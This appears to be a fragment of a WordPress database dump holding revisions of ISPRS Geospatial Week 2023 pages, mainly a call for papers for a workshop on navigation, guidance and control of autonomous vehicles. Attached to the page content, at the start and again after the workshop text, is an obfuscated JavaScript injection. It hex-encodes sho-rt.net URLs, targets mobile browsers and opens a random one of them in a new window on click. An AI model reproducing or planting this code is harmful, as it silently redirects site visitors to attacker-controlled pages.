_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2023-02-05 14:16:26','2023-02-05 14:16:26','',2798,'https://gsw2023.com/?p=3827',0,'revision','',0),
(3828,1,'2023-02-05 14:18:06','2023-02-05 14:18:06','[vc_row][vc_column width=\"2/3\"][vc_column_text]\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\n<h5></h5>\n<h5><strong>Scope:</strong></h5>\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\n[/vc_column_text][vc_column_text]\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\n.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\n<h1 style=\"text-align: left;\">CHAIRS</h1>\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\n<ul>\n 	<li>\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\n</li>\n 	<li>\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\n</li>\n 	<li>\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\n</li>\n 	<li>\n<h6><strong>Applications of AVs.</strong></h6>\n</li>\n</ul>\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n 	<li>\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\n</li>\n 	<li>\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\n</li>\n 	<li>\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\n</li>\n 	<li>\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Caroline Channel, ISAE-Supaero, France</strong></h6>\n</li>\n 	<li>\n<h6><strong>Ashraf Abosekeen, Military Technical College, Cairo, Egypt.</strong></h6>\n</li>\n 	<li>\n<h6><strong>Umar Iqbal, Mississippi State University, USA</strong></h6>\n</li>\n</ul>\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles','','inherit','closed','closed','','2856-autosave-v1','','','2023-02-05 14:18:06','2023-02-05 14:18:06','',2856,'https://gsw2023.com/?p=3828',0,'revision','',0),
(3829,1,'2023-02-05 14:17:05','2023-02-05 14:17:05','[vc_row][vc_column width=\"2/3\"][vc_column_text]\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>NGC of AV: Navigation, Guidance and Control of Autonomous Vehicles</strong></span></h5>\r\n<h5></h5>\r\n<h5><strong>Scope:</strong></h5>\r\n<h5><strong>Integrated Wireless, Multi-Sensor, Multi-Perception Systems for High-Precision Positioning, Guidance and Control of Autonomous Vehicles</strong></h5>\r\n[/vc_column_text][vc_column_text]\r\n<h6 style=\"text-align: justify; color: black;\"><strong>Autonomous vehicles (AVs) promise to enhance safety, reduce emissions, and improve transportation system efficiency and reliability. The growing demand for AVs is shaping the future of the automotive industry by transforming the in-vehicle experience and paving the way for large-scale implementation of autonomous driving. The positioning, guidance, and control technologies for future Avs are rapidly advancing. They require on onboard intelligence relying on a suite of sensors and systems such as global navigation satellite systems (GNSS) receivers, mmWave wireless technology (5G/6G), vehicle motion sensors and remote sensing systems including cameras, light detection and ranging (LiDAR) and radar. AVs that can sense the environment and navigating without human input require robust advanced positioning, navigation, and guidance for efficient operation in all environments and weather conditions. The availability of the above sensors and systems in future AVs provides an attractive opportunity to advance the robustness and safety of autonomous driving. This workshop will seek original contributions covering advanced topics related to the state of the art and future trends of positioning and mapping as well as control and guidance technologies for autonomous vehicles and future self-driving.</strong></h6>\r\n<h6><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h6>\r\n.[/vc_column_text][/vc_column][vc_column width=\"1/3\"][vc_single_image image=\"2857\" img_size=\"600x400\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: left;\">CHAIRS</h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"53\"][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Themes:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>GNSS based high precision positioning in challenging urban environments.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>New wireless technologies and methods for AV connectivity, cooperative perception, positioning, and path planning.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Recent technical advances in perception systems meeting the growing AV demands.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Advanced AI-based multi-system fusion for positioning, mapping, and guidance.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Machine-learning based object identification, classification, and mapping.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovative self-Localization and mapping (SLAM).</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Control of AVs and mobile robots.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Communication schemes for multiple AVs.</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Innovations in other autonomous systems (UAVs, UGVs, and drones)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Applications of AVs.</strong></h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n 	<li>\r\n<h6><strong>Cairo Lúcio Nascimento Junior, ITA, Brazil</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Peter Travis Jardine, Royal Military College of Canada, ON, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Tamazin, Orolia, Montreal, QC, Canada</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Paul Hershey, Raytheon, USA (I still need to confirm with him)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Technologies Inc.</strong></h6>\r\n</li>\r\n 	